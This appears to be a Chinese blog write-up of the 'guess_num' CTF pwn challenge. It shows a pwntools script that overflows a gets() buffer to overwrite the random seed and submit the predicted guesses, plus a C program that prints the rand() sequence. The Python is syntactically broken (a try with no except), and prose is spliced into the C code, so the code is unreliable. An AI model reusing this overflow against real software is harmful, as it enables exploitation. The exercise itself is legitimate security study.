guess_num的wp

最新推荐文章于 2024-05-25 19:54:29 发布
最新推荐文章于 2024-05-25 19:54:29 发布
阅读量133 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/wuyvle/article/details/113003698
版权

guess_num

这题很有趣(
放Linux康康
在这里插入图片描述

好家伙保护直接加满了,这是个64位程序,放进ida64康康
在这里插入图片描述
这题关键在于gets和srand函数的作用
分析函数,srand是根据seed[0]随机生成数
这题要猜10次数字全对才能得到flag
接下来康康gets这个危险函数
在这里插入图片描述
思路是从v7下来把seed覆盖成为我们想要的值
在此之前,我们要写一个srand函数

from pwn import *
from ctypes import *
#引入c语言函数库
context(os = "linux" , arch = "amd64" , log_level = "debug")
content = 1

def srand():   
	#书写srand函数
	lib = cdll.LoadLibrary("libc.so.6")
	#链接动态函数库
	lib.srand(1)

	for i in range(10):
		number = str(lib.rand()%6 + 1)
		#生成数字
		peiqi.recvuntil("Please input your guess number:")
		peiqi.sendline(number)



def main():
	global peiqi
	try:
		if content == 1:
			peiqi = process("guess") 
		else:
			peiqi = remote("220.249.52.133",43180)
	
	payload = b"a" * (0x30-0x10)
	payload = payload + p64(1)

	peiqi.recvuntil("Your name:")
	peiqi.sendline(payload)

	srand()
	peiqi.interactive()

main()

这是方法一,本质是用Python写c语言代码,不过要用到动态链接库,还要引入函数库
由此可以用到方法二,直接编写c语言,运行后直接得到要猜的数字,然后一个个输进去
有点偷懒,不过不用Python写srand了,只用写一段C语言代码‘

方法二

#include <stdio.h>
#include <stdlib.h>
生成的结果如下
这里我们使用的是'a'来做随机数的种子,所以在获取flag的时候也要用a将种子覆盖掉。按照上面生成的
顺序输入获得flag
int main()
{
srand(0x61616161);
//函数srand需要的种子
for (int i = 0; i < 10; i++)
{
int b = rand() % 6 + 1;
printf("%d\n", b);
}
system("pause");
return(0);
}

运行结果
在这里插入图片描述

然后执行脚本
get flag

w0nderMaker
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
2021-10-20 MSSCTF_2021_Finals_WP
m0_56897090的博客
10-20 629
文章目录CryptoBlock_of_Hash_new题目代码题目分析EXPRight_now题目代码题目分析EXPBLOCK_OF_HASH_2021题目代码题目分析EXPOFB_2021题目代码题目分析EXPPWNelfBuychunk_MSSCTF2021Finals笔记EXPshellcode_MSSCTF2021Finals笔记EXPsignin_MSSCTF2021Finals笔记EXPWhereIsGadgets_MSSCTF2021Finals笔记EXPReserveGIFT_MSSCTF2
guess-numwp
WangLal的博客
03-06 191
攻防世界PWN guess nun的wp 基本三步 checksec,file,执行文件 发现是个64位文件,且只有RELRO没开( 出现Permission denied报错时,用chmod去修改文件权限,就可以了 放进IDA中,在各函数中寻找 在函数sub_C3E中找到了 再进入main函数中怎样获得flag,上网找了一下srand和rand的含义 srand函数是随机数发生器的初始化函数。 srand和rand()配合使用产生伪随机数序列。 所以要通过给srand设置为0或1, 来保证生成的随机数
pwn 做题记录 2.9 adworld guess_num
qq_62423835的博客
02-09 241
菜鸡日记,包含着大量迷惑,师傅们可以进来喷,找详细题解就不要点了
(wp)攻防世界PWN——guess_num
0pt1mus
04-02 1132
转载自个人博客0pt1mus 好久没有做PWN题了,今天开始做一下,把之前的东西捡起来,同时对之前有些知识点也有了新的认识,新的理解。 分析 首先将附件下载下来,同时通过nc连接一下,了解一下大致的流程。 可以看到,先让我们输入用户名,然后输入猜的的数字。 然后常规操作,通过file和checksec工具判断文件类型和开启了那些防护措施。 可以知道这是一个64位的linux程序,并且开启了部分...
攻防世界-wp-PWN-新手区-3-guess_num
Scorpio_m7
02-05 1508
题目描述: 菜鸡在玩一个猜数字的游戏,但他无论如何都银不了,你能帮助他么 题目场景: 220.249.52.133:35323 题目附件: b59204f56a0545e8a22f8518e749f19f 题目思路: 随机函数生成的随机数并不是真的随机数,他们只是在一定范围内随机,实际上是一段数字的循环,这些数字取决于随机种子。 解题过程: 载入IDA64,找到main函数,F5反编译得到伪C代码,发现输入v8名字时可以覆盖sreed[0],这样这个随机数列就可控了。 __int64 __fastcall
[Pwn]攻防世界pwn题目wp--guess_num,hello_pwn
WitherC的练级之路
10-03 257
pwn 学习篇 0x1 攻防世界guess_num 下载题目所给附件,使用checksec 进行查看 发现是一个 64bit的文件,relro开启了部分保护以及开启了NX保护 常规丢进ida64进行反编译 左侧函数栏找到main函数 F5 发现函数体大致意思是通过rand()函数进行随机数的生成并对用户输入的数字进行十次比对,有一次不对即执行exit(1)终止此程序段,若10次都比对成功则可以得到返回的flag值。 由于随机数的产生不可控的,因此题目思路大概是通过在名字输入时的gets函数进行对seed的
ISCC 2024 部分wp
焦虑的焦虑
05-25 5574
ISCC 2024 部分wp
SHCTF 2023 misc&web wp
Nanian233的博客
10-30 687
SHCTF2023 misc&web部分wp
基于Matlab的模糊PID控制系统设计及仿真.pdf
08-05
基于Matlab的模糊PID控制系统设计及仿真
黑马头条,黑马头条,黑马头条
08-05
黑马头条,黑马头条,黑马头条
基于ppo算法的计算卸载策略研究python
08-05
ppo算法 基于ppo算法的计算卸载策略研究 适用人群:学习不同技术领域的小白或进阶学习者;可作为毕设项目、课程设计、大作业、工程实训或初期项目立项。
SQLTools插件下载与使用说明
08-05
1
超声波测试方案+气体+液体
08-05
超声波流量计应用的集成式超声波感应解决方案 (USS) 子系统
计算机网络开发 -Socket编程介绍.pdf
08-05
计算机网络开发 -Socket编程介绍
2023-04-06-项目笔记 - 第二百一十六阶段 - 4.4.2.214全局变量的作用域-214 -2024.08.05
08-05
2023-04-06-项目笔记-第二百一十六阶段-课前小分享_小分享1.坚持提交gitee 小分享2.作业中提交代码 小分享3.写代码注意代码风格 4.3.1变量的使用 4.4变量的作用域与生命周期 4.4.1局部变量的作用域 4.4.2全局变量的作用域 4.4.2.1全局变量的作用域_1 4.4.2.214局变量的作用域_214- 2024-08-05
CRCTool modbus通讯工具
最新发布
08-05
CRCTool modbus通讯工具
爬取豆瓣电影源代码数据-项目实战7-爬取源代码数据-ipynb格式-Python语法-用Jupyter notebook打开
08-05
爬取豆瓣电影TOP250源代码数据-项目实战7-爬取源代码数据-ipynb格式-Python语法-用Jupyter notebook打开 用来练习如何爬取源代码数据,可用Pycharm,也可用 Jupyter notebook进行编写代码,相关代码已给出,拿到豆瓣电影TOP250页面的源代码之后,从而得到可供下一步分析的数据。 整个流程清晰,每个步骤均用Make down编辑器进行编辑文字,相关部分会加以图片讲解,并给出了相关代码 最后祝您变得更强
2024电赛 不要让M0G3507成为阻碍.zip
08-05
对于计算机专业的学生而言,参加各类比赛能够带来多方面的益处,具体包括但不限于以下几点: 技能提升: 参与比赛促使学生深入学习和掌握计算机领域的专业知识与技能,如编程语言、算法设计、软件工程、网络安全等。 比赛通常涉及实际问题的解决,有助于将理论知识应用于实践中,增强问题解决能力。 实践经验: 大多数比赛都要求参赛者设计并实现解决方案,这提供了宝贵的动手操作机会,有助于积累项目经验。 实践经验对于计算机专业的学生尤为重要,因为雇主往往更青睐有实际项目背景的候选人。 团队合作: 许多比赛鼓励团队协作,这有助于培养学生的团队精神、沟通技巧和领导能力。 团队合作还能促进学生之间的知识共享和思维碰撞,有助于形成更全面的解决方案。 职业发展: 获奖经历可以显著增强简历的吸引力,为求职或继续深造提供有力支持。 某些比赛可能直接与企业合作,提供实习、工作机会或奖学金,为学生的职业生涯打开更多门路。 网络拓展: 比赛是结识同行业人才的好机会,可以帮助学生建立行业联系,这对于未来的职业发展非常重要。 奖金与荣誉: 许多比赛提供奖金或奖品,这不仅能给予学生经济上的奖励,还能增强其成就感和自信心。 荣誉证书或奖状可以证明学生的成就,对个人品牌建设有积极作用。 创新与研究: 参加比赛可以激发学生的创新思维,推动科研项目的开展,有时甚至能促成学术论文的发表。 个人成长: 在准备和参加比赛的过程中,学生将面临压力与挑战,这有助于培养良好的心理素质和抗压能力。 自我挑战和克服困难的经历对个人成长有着深远的影响。 综上所述,参加计算机领域的比赛对于学生来说是一个全面发展的平台,不仅可以提升专业技能,还能增强团队协作、沟通、解决问题的能力,并为未来的职业生涯奠定坚实的基础。
攻防世界guess_num
08-31
攻防世界guess_num是一个题目,它要求玩家猜测一个数字并输入。根据引用的结果"cyberpeace{a6473686121bdc644837b076c3207788}",可以猜测这个题目的答案可能是"a6473686121bdc644837b076c3207788"。PIE和ASLR是一些...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值